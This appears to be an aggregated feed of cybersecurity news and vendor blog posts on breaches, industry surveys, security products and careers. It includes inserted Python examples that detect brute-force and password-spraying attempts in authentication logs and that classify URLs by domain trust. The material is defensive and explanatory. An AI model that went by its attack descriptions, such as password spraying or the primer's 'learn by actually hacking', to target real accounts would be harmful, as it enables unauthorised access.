While an attack on such a grand scale has not materialized as yet, Panetta’s warning sounds even more pertinent in this day and age of the Internet of Things (IoT). We live in the era of smart, where every device has the smart label in front of it – smart televisions, smart vehicles, smart cities, smart toasters, smart lights, etc. The boundaries between the physical and the cyber have merged and there has been a rise of cyber-physical attacks – cyber attacks which have an impact in the physical world as well.

Not a new phenomenon

Of course, perhaps the most noteworthy cyber-physical attack was the Stuxnet malicious worm, discovered in 2010. While no one has claimed responsibility, it caused substantial damage to Iran’s nuclear program, causing the nuclear centrifuges to tear themselves apart. It was believed to be created by American & Israeli cyber experts.

But in recent years, there have been examples of cyber-physical attacks at a much lower scale but with a similar potential for destruction. In Italy this year, some researchers travelled to various construction sites and demonstrated to workers there that they could easily take control of construction cranes remotely, making them perform whatever actions they wished. The message was clear – construction cranes are incredibly vulnerable and, in the hands of a malicious group, could cause immense destruction.

Shock and awe

At a grander scale, power grids in Ukraine were successfully targeted in December 2015 and the consequences were severe. Electricity supply was disrupted and more than 230 thousand people were left without power for one to six hours. In Germany in 2014, a cyber attack caused massive damage at a blast furnace in a German steel mill when attackers gained access to control systems, which led to parts of the plant failing and the blast furnace being damaged.

It’s quite clear then that enterprises also must take note of this growing and troubling trend of cyber-physical attacks and take the steps required to secure themselves against this threat. Some of the ways they can do that are:

  • Plug the gaps – Most cyber-physical attacks happen due to gaps in the enterprise’s network security. Enterprises must constantly keep monitoring their security perimeters and step in to plug those gaps as soon as possible.
  • Understand your environment – It is important for organizations to have an ear to the ground regarding the industry they operate in and what are the new threats. Staying aware of the new trends and vulnerabilities will ensure that they can react and respond to threats as soon as they emerge.
  • Create a culture of security – It is incumbent on enterprises to create a security-first approach in their organization. This includes training employees on the importance of cybersecurity, and ensuring that there are strict cybersecurity policies and that compliance with them is enforced.
  • Include physical security with cybersecurity – As mentioned earlier, the boundaries between the physical and digital worlds are converging and enterprises must be secure in both the worlds. Physical security is also paramount in this regard with strict rules against tailgating, secure access control systems and proper storage of confidential information.
  • Use a secure cybersecurity solution – A strong cybersecurity solution will allow enterprises to secure their defenses along with monitoring their network activity. Enterprises can consider Seqrite’s Endpoint Security (EPS) which is a simple and innovative platform integrating advanced technologies to protect the network.

The post Rise of cyber-physical attacks appeared first on Seqrite Blog.

Equifax’s Nightmare Continues, Credit Rating “Negative”

Since 2017, Hackercombat.com covered the data breach incident of Equifax and all its relevant angles. The latest was just last March 9, 2019, when the U.S. Senate’s Committee on Homeland Security and Governmental Affairs released their committee report about the result of its probe of the incident. The report included not only the embarrassing situation of Equifax before and after the cyber attack, but also included proposals through legislation on helping companies not to become the next victim of a similar incident.

However, that was not the last episode in this long-running Equifax drama series. The nightmare for Equifax is not yet ending, as Moody’s, one of the global credit rating agencies, has slapped the data analytics firm with a drastic credit rating downgrade. Moody’s action is highlighted by the demotion of Equifax’s credit outlook from “stable” to “negative”, which will be felt by the company in the current year.

“We are treating this with more significance because it is the first time that cyber has been a named factor in an outlook change. This is the first time the fallout from a breach has moved the needle enough to contribute to the change,” explained Joe Mielenhausen, Moody’s Spokesperson.

With the downgrade, Equifax will have a harder time paying for its current loans, and a tougher time persuading financial institutions to extend any future credit. Moody’s cited the $690 million in post-breach expenses that Equifax had to absorb as the justification for the credit rating downgrade. That amount was the closest estimate of all the expenses Equifax incurred to settle the class action lawsuits and all the state and federal fines facing the company after the incident.

“We estimate Equifax’s cybersecurity expenses and capital investments will total about $400 million in both 2019 and 2020 before declining to about $250 million in 2021. Beyond 2020, infrastructure investments are likely to remain higher than they had been before the 2017 breach. The heightened emphasis on cybersecurity for all data oriented companies, which is especially acute for Equifax, leads us to expect that higher cybersecurity costs will continue to hurt the company’s profit and free cash flow for the foreseeable future,” said Moody’s in a Press Release.

In November 2018, Moody’s changed its rating system, adding how an entity handles cybersecurity risks and incidents as a weighted factor in judging its credit rating. It is a huge reform by Moody’s, given that cybersecurity issues had not affected the credit rating of companies before.

“For us, it’s not something we view as a totally new idea. We’ve been in the risk management business for a very long time. This is to enhance our thinking about credit as cyber becomes more and more important. We haven’t yet moved a credit rating due to cyber risk or a cyber event, but we see the likelihood of credit-rating impact as steadily increasing. Different sectors have different levels of credit sensitivity to cyber risk. For those higher-risk sectors, there will be impact down to the individual issuer-level over time,” added Derek Vadala, Moody’s Lead for Investors Services Cyber Risk Group.


Fundamentals Of Making A Hacker Out Of You

There is no academic background necessary to become a hacker, given that even the most famous hackers in history, like Kevin Mitnick, were self-trained. However, anyone who wishes to become one needs to be familiar with everything related to computers and other computing devices such as smartphones. A good grasp of the English language is also an advantage, given that many programming languages were built with English as their base language.

To become a hacker, it is not enough to have knowledge of only one field. Enthusiasm is the key, since self-training is a tough road: you have to teach yourself the discipline as well as the relevant understanding of political and economic movements. To gain effective knowledge, you can go to a university with an IT department, study at a specialized school to learn the basics of personal computers, or sign up for online tutorials that teach you the basics.

Are there qualifications necessary for hackers?
There is no qualification required to become a hacker, but we need to be clear here. Black-hat hacking is a crime in many jurisdictions; infiltrating a network or a remote computer without permission from its owners or administrators is no different from entering someone’s physical property without consent. The bottom line, as with learning a sport, is that practicing to become a hacker means actually hacking. The other option is to become a white-hat hacker, meaning you join a team that hacks systems legally as part of a penetration testing engagement.

If you are starting from scratch, where should you start?
The best shortcut is to learn computers beyond the GUI: learn to use a more advanced operating system such as Linux, while also improving your proficiency in XHTML and C. If you learn hacking on your own, you have to go through many difficult paths; it is rather hard, but fulfilling if the knowledge is used productively and lawfully. This is no different from learning to play a musical instrument on your own with some written references as your guides.

First, let’s talk about the GUI.

The screen you are staring at right now is an example of a Graphical User Interface (GUI). On the other hand, a screen showing only text, of the kind often seen in sci-fi movies and dramas, is called a CLI (Command Line Interface).

Skills to handle Linux, which is an OS that is used frequently for programming, system administration and network administration are essential.

Also, there are many languages required to become a hacker, from those used for web page creation to the language used for database management:

・ XHTML
・ Python
・ C
・ PHP
・ Java
・ SQL

An example of a path to becoming a white-hat hacker:
White-hat hackers are recruited by both general companies and government agencies. Becoming a white-hat hacker means becoming an IT professional whose task is to keep network and computer systems secure by running simulated attacks against your own employer’s systems. In a typical-size company, this is the job that holds responsibility for general-purpose cybersecurity.

Government work has a much broader scope than that of general-purpose white-hat hackers, but it plays a very important role in society. If you are aiming to become a hacker with no prior experience, you should first aim for employment at a general company and learn the ropes in its internal IT team. An interest in networking, network protocol management and decompiling programs is a huge asset.

Making you a hacker in just one article is impossible; all we can say is that continuing to read our articles here at hackercombat.com will give you more insight into the world of cybersecurity today. A real white-hat hacker stays up to date on every important change in the real world, as it is intertwined with computing, networking, the Internet and its contents.

The post Fundamentals Of Making A Hacker Out Of You appeared first on hackercombat.com.

Essential Cybersecurity Tools for Business Organizations

Businesses today have become the prime target of cyberattacks of all kinds. This is because cybercriminals understand that targeting a business could get them huge amounts of data, both corporate data and sensitive personal data of customers. In recent times, large enterprises all across the world have been targeted by cybercriminals. Such attacks have resulted in the theft of financial and personal information belonging to millions of customers.

The cost of dealing with cyberattacks, too, is rising, and in today’s context a cyberattack could prove devastating for smaller businesses. Many business organizations, especially the smaller ones, are so crippled by cyberattacks that they are forced to close down within a few months of the attack.

Another aspect of the damage inflicted by cyberattacks is the harm done to the reputation of any business, big or small. The trust that customers place in a company, its overall credibility in the market and its brand reputation are factors that contribute to the success of any business. Cyberattacks impact all of these heavily, and hence businesses need to protect their networks and infrastructure from all kinds of cyberattacks. For this, they need different kinds of tools that help them boost their defenses and protect their business assets and reputation. Investing in acquiring and deploying such tools is always a wise decision. Given that the costs of cyberattacks that companies have to bear today are increasing, it is only sensible to have all the cybersecurity tools that are needed and to prevent cyberattacks as far as possible.

Here’s a look at some of the best cybersecurity tools that are available in the market today…

XpoLog for Log Analysis

Log analysis tools help businesses analyze the logs recorded by computers and other digital devices connected to their networks. Most systems and devices log almost every computing process happening within them, so analyzing logs to study patterns and trends can help identify and prevent security breaches or malware infections. Manual analysis is often difficult, as log files are dumps of data stored in plain text format. This is where log analysis tools come in. XpoLog is a highly useful tool that many businesses use today for log analysis. Log files from all sources (endpoints, applications, servers, etc.) are collected and analyzed using AI (Artificial Intelligence). If any alarming patterns are seen, alerts are sent to the administrators, who can immediately take action to prevent damage to the business network and reduce the possibility of cyberattacks.
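To make the "alarming patterns" concrete, here is an added example of the kind of rule a log analysis pipeline applies. It is not XpoLog's code or any vendor's detection logic; it parses a few constructed sshd-style authentication lines (sample data made up for this example, with documentation-range IP addresses) and flags two patterns on the defender's side: a brute-force run against a single account, and password spraying, where one source tries a few passwords against many different accounts, the technique named in the Citrix incident further down this page. The thresholds are illustrative assumptions, not values from any product.

```python
"""Added example: flag brute-force and password-spraying patterns in auth logs.

Toy analyser over constructed sshd-style log lines. The thresholds below
are illustrative assumptions, not values taken from any product.
"""
import re
from collections import defaultdict

# Constructed sample log lines (not real data; documentation-range IPs).
SAMPLE_LOG = """\
May 14 09:01:02 web01 sshd[2201]: Failed password for alice from 203.0.113.7 port 50122 ssh2
May 14 09:01:04 web01 sshd[2201]: Failed password for alice from 203.0.113.7 port 50123 ssh2
May 14 09:01:05 web01 sshd[2201]: Failed password for alice from 203.0.113.7 port 50124 ssh2
May 14 09:01:07 web01 sshd[2201]: Failed password for alice from 203.0.113.7 port 50125 ssh2
May 14 09:01:09 web01 sshd[2201]: Failed password for alice from 203.0.113.7 port 50126 ssh2
May 14 09:02:10 web01 sshd[2310]: Failed password for bob from 198.51.100.23 port 40001 ssh2
May 14 09:02:11 web01 sshd[2310]: Failed password for carol from 198.51.100.23 port 40002 ssh2
May 14 09:02:12 web01 sshd[2310]: Failed password for invalid user dave from 198.51.100.23 port 40003 ssh2
May 14 09:02:13 web01 sshd[2310]: Failed password for erin from 198.51.100.23 port 40004 ssh2
May 14 09:02:14 web01 sshd[2310]: Failed password for frank from 198.51.100.23 port 40005 ssh2
May 14 09:03:00 web01 sshd[2400]: Accepted publickey for alice from 192.0.2.10 port 51000 ssh2
May 14 09:03:30 web01 sshd[2410]: Failed password for alice from 192.0.2.10 port 51001 ssh2
"""

# Matches both "Failed password for USER from IP" and the
# "invalid user" variant sshd emits for unknown account names.
FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port"
)


def parse_failures(log_text):
    """Return a list of (user, ip) tuples, one per failed password attempt."""
    events = []
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            events.append((m.group("user"), m.group("ip")))
    return events


def detect_patterns(events, bruteforce_min=5, spray_min_users=4):
    """Classify each source IP by the shape of its failures.

    brute_force:    at least bruteforce_min failures against one account.
    password_spray: at least spray_min_users distinct accounts, each with
                    fewer than bruteforce_min failures (low and wide).
    Sources below both thresholds (a user mistyping once) are not reported.
    """
    per_ip_user = defaultdict(lambda: defaultdict(int))
    for user, ip in events:
        per_ip_user[ip][user] += 1

    findings = {}
    for ip, users in per_ip_user.items():
        worst_single_account = max(users.values())
        if worst_single_account >= bruteforce_min:
            findings[ip] = "brute_force"
        elif len(users) >= spray_min_users:
            findings[ip] = "password_spray"
    return findings


def analyse(log_text=SAMPLE_LOG):
    """Run the full pipeline: parse, aggregate per source, classify."""
    return detect_patterns(parse_failures(log_text))


if __name__ == "__main__":
    for ip, verdict in sorted(analyse().items()):
        print(f"{ip}: {verdict}")
```

The two classifications deliberately key on different shapes: a per-account failure counter catches the noisy brute force, while a per-source distinct-account counter is what surfaces spraying, which stays under any per-account lockout threshold by design. The third source, one failed password followed by a successful key login, falls below both thresholds and produces no alert.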

Riskified for Fraud Detection

Whenever an online transaction takes place, there is a chance of online fraud as well. Hackers who have already laid hands on personal or financial data could use it to manipulate banking networks or e-commerce channels and commit fraud, causing big losses to businesses. Security tools like Riskified help prevent such fraud during online transactions by using machine learning to analyze transactions and allow only legitimate orders to be processed. The dynamic checkout feature of this tool automatically adjusts the checking process based on an individual user’s risk profile, offering the user different options to verify their purchases.

HoxHunt for Protection from Phishing Scams

Most cyberattacks start with a phishing scam that gives cybercriminals an opportunity to breach networks and compromise business infrastructure. The hackers use phishing emails either to steal credentials or to install malware that could later help them breach data. The best defense against this is undoubtedly to stay alert and informed at the individual level. At the same time, there are tools that provide protection against phishing scams. One such tool is HoxHunt, which works by teaching users how to identify malicious or phishing emails and messages. The tool uses an AI-driven engine to personalize simulated phishing attacks so that they mimic what real-world attacks look like. Once users identify the attacks, they can report them using a dedicated plugin and receive feedback on their performance.

Imperva for Application and Data Protection

Key network resources like web applications and databases are often targeted by hackers, so it is important to protect them using WAFs (Web Application Firewalls) and data protection services. Imperva is one tool that provides a WAF and aids in DDoS attack mitigation as well. In today’s context, when businesses depend on on-premise devices as well as cloud components, a tool like Imperva could help greatly. Imperva’s WAF inspects all traffic and transactions and prevents malicious traffic from entering the network or impacting the cloud components, blocking unauthorized access to applications and databases.

Metasploit for Penetration Testing

Penetration testing is integral to ensuring cybersecurity for any business organization. As we know, penetration testing tools simulate cyberattacks and check for security vulnerabilities and issues. Metasploit is an open source framework that helps IT administrators perform penetration testing on business networks. Metasploit can be configured to scan networks for exploitable weaknesses and then deploy a payload to systems that have security vulnerabilities. The framework, which runs on Windows, Linux and macOS, comes with evasion tools that could circumvent existing security controls and then look for security issues, which can be fixed before a real cyberattack happens.

The post Essential Cybersecurity Tools for Business Organizations appeared first on .

Solving the network visibility problem with NaaS

Network visibility is crucial for many things: making sure that the equipment works properly, monitoring and tweaking the network’s performance, and protecting it against attacks. “Network visibility also helps you update your cybersecurity strategy based on current threats. It’s important for the short term, as this is a very dynamic world, and for the long term because it allows an organization to improve its cyber resilience,” says Amit Bareket, CEO of Perimeter 81. The most … More

The post Solving the network visibility problem with NaaS appeared first on Help Net Security.

Enterprises: Analyze your IoT footprint to address security, privacy concerns

The Zscaler ThreatLabZ research team analyzed 56 million IoT device transactions to understand the types of devices in use, the protocols used, the locations of the servers with which they communicated, and the frequency of inbound and outbound communications. The analysis showed that more than 1,000 organizations have at least one IoT device transmitting data from the network to the internet via the Zscaler cloud platform. The most commonly detected IoT device categories included IP … More

The post Enterprises: Analyze your IoT footprint to address security, privacy concerns appeared first on Help Net Security.

Most security pros have considered quitting due to a lack of resources

Companies are suffering from a lack of resources, both in terms of people and technology (79 percent), and 72 percent have considered leaving their jobs for this reason, Censornet research reveals. Security professionals believe their jobs and the overall security of their organizations would benefit from an autonomous security solution that could automatically react to and prevent attacks. More technology is harming cybersecurity: the survey found that security professionals are not being helped by their … More

The post Most security pros have considered quitting due to a lack of resources appeared first on Help Net Security.

High-risk behaviors expose most travelers to cyber risks

The travel industry and its customers are increasingly the targets of cyberattacks as criminals seek to monetize highly valuable travel data, according to the new IBM Security research. Compounding the problem, a new survey conducted by Morning Consult on behalf of IBM Security reveals that travelers are still blind to the risks they face on the road. The survey found that only 40% of respondents believed it was likely they would be targeted for cybercrime … More

The post High-risk behaviors expose most travelers to cyber risks appeared first on Help Net Security.

Game Golf Exposure Leaves Users in a Sand Trap of Data Concerns

Apps not only provide users with a form of entertainment, but they also help us become more efficient or learn new things. One such app is Game Golf, which comes as a free app, a paid pro version with coaching tools, or with a wearable analyzer. With over 50,000 downloads on Google Play, the app helps golfers track their on-course performance and use the data to help improve their game. Unfortunately, millions of golfer records from the Game Golf app were recently exposed to anyone with an internet connection, thanks to a cloud database lacking password protection.

According to researchers, this exposure consisted of millions of records, including details on 134 million rounds of golf, 4.9 million user notifications, and 19.2 million records in an activity feed folder. Additionally, the database contained profile data like usernames, hashed passwords, emails, gender, Facebook IDs, and authorization tokens. The database also contained network information for the company behind the Game Golf app, Game Your Game Inc., including IP addresses, ports, pathways, and storage information that cybercrooks could potentially exploit to further access the network. A combination of all of this data could theoretically provide cybercriminals with more information on the user, creating greater privacy concerns. Thankfully, the database was secured about two weeks after the company was initially notified of the exposure.

Although it is still unclear as to whether cybercriminals took a swing at this data, the magnitude of the information exposed by the app is cause for concern. Luckily, users can follow these tips to help safeguard their data:

  • Change your passwords. If a cybercriminal got a hold of the exposed data, they could easily gain access into other online accounts if your login credentials were the same across different platforms. Err on the side of caution and change your passwords to something strong and unique for each account.
  • Check to see if you’ve been affected. If you’ve used the Game Golf app and believe your data might have been exposed, use this tool to check or set an alert to be notified of other potential exposures.
  • Secure your online profiles. Use a security solution like McAfee Safe Connect to encrypt your online activity, help protect your privacy by hiding your IP address, and better defend against cybercriminals.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Game Golf Exposure Leaves Users in a Sand Trap of Data Concerns appeared first on McAfee Blogs.

New browser extensions for integrating Microsoft’s hardware-based isolation

The hardware-based isolation technology on Windows 10 that allows Microsoft Edge to isolate browser-based attacks is now available as a browser extension for Google Chrome and Mozilla Firefox.

We introduced the container technology in 2017. Since then, we have been evolving the technology and engaging with customers to understand how hardware-based isolation can best help solve their security concerns. We know that many of our customers depend on multi-browser environments to allow enterprise apps to meet various compatibility requirements and enable productivity. And while modern browsers are continuously working to mitigate vulnerabilities, there are still exposures across these complex engines that can lead to irreversible and costly damages.

To provide customers with a comprehensive solution to isolate potential browser-based attacks, we have designed and developed Windows Defender Application Guard extensions, now generally available, to allow customers to integrate hardware-based isolation with Google Chrome and Mozilla Firefox.

How it works

The extensions for Google Chrome and Mozilla Firefox automatically redirect untrusted navigations to Windows Defender Application Guard for Microsoft Edge. The extension relies on a native application that we’ve built to support the communication between the browser and the device’s Application Guard settings.

When users navigate to a site, the extension checks the URL against a list of enterprise sites defined by enterprise administrators. If the site is determined to be untrusted, the user is redirected to an isolated Microsoft Edge session. In the isolated Microsoft Edge session, the user can freely navigate to any site that has not been explicitly defined as enterprise-trusted by their organization without any risk to the rest of the system. With our upcoming dynamic switching capability, if the user tries to go to an enterprise site while in an isolated Microsoft Edge session, the user is taken back to the default browser.
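The trust decision described above reduces to one question: does this URL's host belong to an enterprise-defined domain, or not? The following is an added example of that check, written for this page and not Microsoft's code; the trusted-domain list, its format and the treatment of non-web schemes are all assumptions made here, not Application Guard's actual policy format. It is worth showing because the obvious implementation (a string suffix match) gets it wrong, and a wrong answer here means an untrusted site is opened in the default browser instead of the isolated session.

```python
"""Added example: classify a navigation as enterprise-trusted or untrusted.

Illustrative only. TRUSTED_DOMAINS and its format are assumptions for this
example, not the real Application Guard network-isolation policy format.
"""
from urllib.parse import urlsplit

# Constructed enterprise-trusted list (assumption for this example).
# Each entry trusts the domain itself and all of its subdomains.
TRUSTED_DOMAINS = ("contoso.com", "intranet.example")


def host_of(url):
    """Return the normalised host of an http(s) URL, or None otherwise.

    urlsplit().hostname already drops userinfo and the port and lowercases
    the name, so 'https://user@CONTOSO.com:8443/' yields 'contoso.com'.
    Non-web schemes are treated as untrusted here (an assumption of this
    example, not documented product behaviour).
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    return parts.hostname.rstrip(".")  # ignore a trailing FQDN dot


def is_trusted(url, trusted=TRUSTED_DOMAINS):
    """True only if the host equals a trusted domain or is a subdomain of one.

    Matching on the dot boundary is the important detail: a plain
    host.endswith("contoso.com") would also accept 'evil-contoso.com'.
    """
    host = host_of(url)
    if host is None:
        return False
    for domain in trusted:
        domain = domain.lower().rstrip(".")
        if host == domain or host.endswith("." + domain):
            return True
    return False


def route(url):
    """Where the navigation goes: the default browser or the isolated session."""
    return "default_browser" if is_trusted(url) else "isolated_session"


if __name__ == "__main__":
    for u in (
        "https://portal.contoso.com/reports",
        "https://user@CONTOSO.com:8443/",
        "https://evil-contoso.com/login",
        "https://contoso.com.attacker.example/",
        "ftp://contoso.com/",
    ):
        print(f"{u:45} -> {route(u)}")
```

The two negative cases at the end are the ones that matter: `evil-contoso.com` shares a suffix with the trusted name but is a different registrable domain, and `contoso.com.attacker.example` merely embeds the trusted name as a label, so both are sent to the isolated session.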

To configure the Application Guard extension under managed mode, enterprise administrators can follow these recommended steps:

  1. Ensure devices meet requirements.
  2. Turn on Windows Defender Application Guard.
  3. Define the network isolation settings to ensure a set of enterprise sites is in place.
  4. Install the new Windows Defender Application Guard companion application from the Microsoft Store.
  5. Install the extension for Google Chrome or Mozilla Firefox browsers provided by Microsoft.
  6. Restart the device.

Intuitive user experience

We designed the user interface to be transparent to users about Windows Defender Application Guard being installed on their devices and what it does. We want to ensure that users are fully aware that their untrusted navigations will be isolated and why.

  1. When users initially open Google Chrome or Mozilla Firefox after the extension is deployed and configured properly, they will see a Windows Defender Application Guard landing page. 
  2. If there are any problems with the configuration, users will get instructions for resolving any configuration errors. 
  3. Users can initiate an Application Guard session without entering a URL or clicking on a link by clicking the extension icon on the menu bar of the browser.

Commitment to keep enterprise users and data safe

Hardware-based isolation is one of the innovations that enhances platform security on Windows 10. It is a critical component of the attack surface reduction capabilities in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) and the broader unified security in Microsoft Threat Protection. With the new Application Guard extension for Google Chrome and Mozilla Firefox, customers can extend the security benefits of isolation in their environments and further reduce attack surface. Customers can confidently navigate the expansive internet with protection for enterprise and personal data.

The Windows Defender Application Guard extensions for Google Chrome and Mozilla Firefox are now available for Windows 10 Professional, Enterprise, and Education SKUs, version 1803 and later with latest updates.


Rona Song
Windows platform security team


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft Defender ATP community.

Follow us on Twitter @MsftSecIntel.

The post New browser extensions for integrating Microsoft’s hardware-based isolation appeared first on Microsoft Security.

Companies increasingly investing in container adoption, security remains an issue

87 percent of IT professionals are now running container technologies, with 90 percent of those running in production and 7 in 10 running at least 40 percent of their application portfolio in containers — an impressive increase from two years ago, when just 67 percent of teams were running container technologies in production, a Portworx and Aqua Security survey reveals. Hurdles: yet despite their pervasiveness, containers aren’t without hurdles: when asked to name their top … More

The post Companies increasingly investing in container adoption, security remains an issue appeared first on Help Net Security.

3 Things You Need to Know About Summer Cybersecurity


The summer season is quickly approaching. Users will take to the skies, roads, and oceans to travel throughout the world for a fun family adventure. But just because users take time off doesn’t mean that their security should. So, with the season’s arrival, we decided to conduct a survey so as to better understand users’ cybersecurity needs and help them leave their cybersecurity woes behind while having some fun in the sun. We asked our users what they are most concerned about during the summer, so we can help them protect what really matters. Let’s see what they had to say.

Sharing the Fun

When it comes to vacations, we’re constantly taking and sharing snaps of amazing memories. What we don’t plan on sharing is the metadata embedded in each photo that can give away more than we intended. In fact, from our research we found that people are 3x more likely to be concerned about their Social Security number being hacked than their photos. Given the risk a compromised SSN poses for the potential of identity theft, it’s no surprise that respondents were more concerned about it. However, to keep the summer fun secure, it’s also important to keep travel photos private and only share securely.

Flying Safely and Securely

From a young age, we have been taught to keep our Social Security number close to the chest, and this is evident in how we protect SSNs. As a matter of fact, 88% of people would be seriously worried if their Social Security number was hacked. The best way to keep a Social Security number secure this summer – don’t share it when purchasing plane tickets or managing travel reservations. All you need to provide is a credit card and passport.

Making Smartphone Security #1  

While on the go, travelers are often keenly aware of how exposed they are physically when carrying around credit cards, passports, suitcases, gadgets and more. However, they also need to think about securing their digital life, particularly their handheld devices. To keep personal photos protected while traveling this summer season, smartphone security must be a top priority. With nearly 40% of respondents concerned about sensitive personal photos being hacked, jet setters need to be proactive about security, not reactive. In fact, we’re reminded of just how important this fact is as we enter the month of June, Internet Safety Month. Just like your laptop or router, it’s vital to protect the personal data stored within a smartphone.

In order to help you stay secure this season, let’s put your travel security knowledge to the test.


The post 3 Things You Need to Know About Summer Cybersecurity appeared first on McAfee Blogs.

Visiting the NSA

Yesterday, I visited the NSA. It was Cyber Command's birthday, but that's not why I was there. I visited as part of the Berklett Cybersecurity Project, run out of the Berkman Klein Center and funded by the Hewlett Foundation. (BERKman hewLETT -- get it? We have a web page, but it's badly out of date.)

It was a full day of meetings, all unclassified but under the Chatham House Rule. Gen. Nakasone welcomed us and took questions at the start. Various senior officials spoke with us on a variety of topics, but mostly focused on three areas:

  • Russian influence operations, both what the NSA and US Cyber Command did during the 2018 election and what they can do in the future;

  • China and the threats to critical infrastructure from untrusted computer hardware, both the 5G network and more broadly;

  • Machine learning, both how to ensure a ML system is compliant with all laws, and how ML can help with other compliance tasks.

It was all interesting. Those first two topics are ones that I am thinking and writing about, and it was good to hear their perspective. I find that I am much more closely aligned with the NSA about cybersecurity than I am about privacy, which made the meeting much less fraught than it would have been if we were discussing Section 702 of the FISA Amendments Act, Section 215 of the USA Freedom Act (up for renewal next year), or any 4th Amendment violations. I don't think we're past those issues by any means, but they make up less of what I am working on.

Cybersecurity roundup – Jan to April ‘19

Estimated reading time: 2 minutes

2019 is not even halfway over and there is already a flurry of cyber attacks all over the globe. Network administrators and cybersecurity experts always have to be on their toes, as no one is safe from the risk of an attack or a data breach. Here is a list of some of the top cybersecurity incidents that made headlines:

  • Facebook accidentally uploads email contacts of 1.5 million users

The world-renowned social networking giant just couldn’t catch a break. Facebook made global headlines for all the wrong reasons again in April 2019. It admitted in an announcement that it may have “unintentionally uploaded” email contacts of 1.5 million new users since May 2016. The beleaguered social networking giant stated these contacts were not shared with anyone else and were being deleted.

  • Personal data of German politicians leaked online

Germany was plunged into chaos when sensitive data belonging to hundreds of German politicians, celebrities and online figures was leaked online via a Twitter account, in one of the largest leaks in the country’s history. The documents included deeply personal identifiable information such as private chats, credit card details and addresses. The Chancellor of Germany, Angela Merkel, was also among those who found their personal information leaked. Police later arrested a 20-year-old German man who admitted to being behind the hack, telling police that he had taken advantage of weak passwords.

  • Security lapse at Indane exposes millions of Aadhaar numbers

Closer to home in India, questions continue to arise over the cybersecurity preparedness of some of the country’s biggest companies. A French security researcher claimed that he discovered a security lapse which exposed millions of Aadhaar numbers of dealers and distributors associated with the Indian oil company Indane. The Aadhaar data of nearly 6.7 million people was left exposed and accessible. Indane later responded that it did not host any Aadhaar data and hence there was no leak.

  • 6 TB of data stolen from US government contractor

The fact that no organization in the world is really safe from cyber attacks became even more evident in March, when news emerged that Iranian-backed hackers had stolen a staggering 6 TB of data from Citrix Systems, a software company that handles sensitive projects for the US government. The stolen data included extremely confidential information related to NASA, aerospace contracts, the FBI and Saudi Arabia’s oil industry, giving an idea of the sheer scale of the attack. The most important cybersecurity lesson to be learnt from this? The hackers got access through “password spraying”: guessing weak passwords across many accounts and then walking in.

  • Data breach at Airbus

The aircraft manufacturing giant faced a crisis this year when it reported that it had detected a cyber attack on its information systems which resulted in a data breach. Though the attack did not affect its operations, Airbus did admit that employee-related details had been lost in the breach. While the company did not reveal the number of records, the fact that a breach could take place on the servers of the world’s second-largest aircraft manufacturer shows that even the biggest companies are still coming to terms with ever-changing threats in the murky world of cybersecurity.

The post Cybersecurity roundup – Jan to April ‘19 appeared first on Seqrite Blog.

The security challenges of managing complex cloud environments

Holistic cloud visibility and control over increasingly complex environments are essential for successful deployments in various cloud scenarios, a Cloud Security Alliance and AlgoSec study reveals. The survey of 700 IT and security professionals aims to analyze and better understand the state of adoption and security in current hybrid cloud and multi-cloud security environments, including public cloud, private cloud, or use of more than one public cloud platform. Key findings of the study include: Cloud … More

The post The security challenges of managing complex cloud environments appeared first on Help Net Security.

Is your perimeter inventory leaving you exposed? Why it’s time to switch from IP to DNS

Historically, security teams and tools have used IP addresses to define their targets and scopes. But in a world where applications and networks are increasingly cloud-hosted or integrated with third-party services, IP addresses alone aren’t enough to ensure coverage. Modern perimeters are dynamic and constantly changing, which can lead organizations to have an inaccurate picture of their risk simply by failing to properly catalog what Internet facing assets they have. Testing against a stale set … More

The post Is your perimeter inventory leaving you exposed? Why it’s time to switch from IP to DNS appeared first on Help Net Security.

Data Security in the Cloud: How to Lock Down the Next-Gen Perimeter

Enjoy the video replay of the recent Threatpost cloud security webinar, featuring a panel of experts offering best practices and ideas for managing data in a cloudified world.

Five ways automating IAM saves you money

Identity is the foundation of security, so a robust automated identity and access management (IAM) system is by far the best way to keep your company’s information safe. It’s also a great way to increase efficiency and save money. It’s no wonder so many businesses are adopting IAM systems. The global market value of identity and access management systems has grown from $4.5 billion in 2012 to $7.1 billion in 2018. By 2021, it is … More

The post Five ways automating IAM saves you money appeared first on Help Net Security.

On the path to Zero Trust security: Time to get started

No need to belabour the point. We all know that trying to defend the network perimeter is a bit futile in today’s mobile and cloud first world. So, the obvious question – what’s next? Vendors are quick to come to your aid with their latest, next generation, virtualized, machine learning and AI based security platform. Industry analysts on the other hand are proposing various security frameworks and approaches for reducing risk. Whether it’s Gartner with … More

The post On the path to Zero Trust security: Time to get started appeared first on Help Net Security.

Ransomware and malware attacks decline, attackers adopting covert tactics

There has been a major decline in ransomware and malware attacks, with Ireland having some of the lowest rates globally, according to the latest report released by Microsoft. This is a significant change from 2017, following a prolific series of attacks that targeted supply chains globally. Initial predictions were that these would increase, however, improvements in cybersecurity measures and detection have impacted on the success rates of these attacks. In fact, there has been a … More

The post Ransomware and malware attacks decline, attackers adopting covert tactics appeared first on Help Net Security.

Over half of all reported vulnerabilities in Q1 2019 have a remote attack vector

There were 5,501 vulnerabilities aggregated by Risk Based Security’s VulnDB that were disclosed during the first three months of 2019. This represents a 1% increase over the same period in 2018, making this Q1 an all-time high. The results were released in the Q1 2019 Vulnerability QuickView Report. CVSSv2 scores of 9.0+, deemed critical issues, accounted for 14.0% of all published Q1 2019 vulnerabilities. Risk Based Security’s VulnDB published 2,539 (85%) more vulnerabilities than CVE/NVD … More

The post Over half of all reported vulnerabilities in Q1 2019 have a remote attack vector appeared first on Help Net Security.

Ireland And Its Evolving Cybersecurity Issues

Ireland in 2018 experienced a huge decline in malware infections, and especially in ransomware cases, compared to 2017. The European country of almost 5 million people is mirroring the global trend in cybersecurity issues, as cybercriminals transition heavily from disruptive and destructive ransomware to silent yet very profitable phishing and cryptojacking. Ireland recorded a monthly infection rate of just 1.26% in 2018, one of the lowest in the European region and one of the lowest globally.

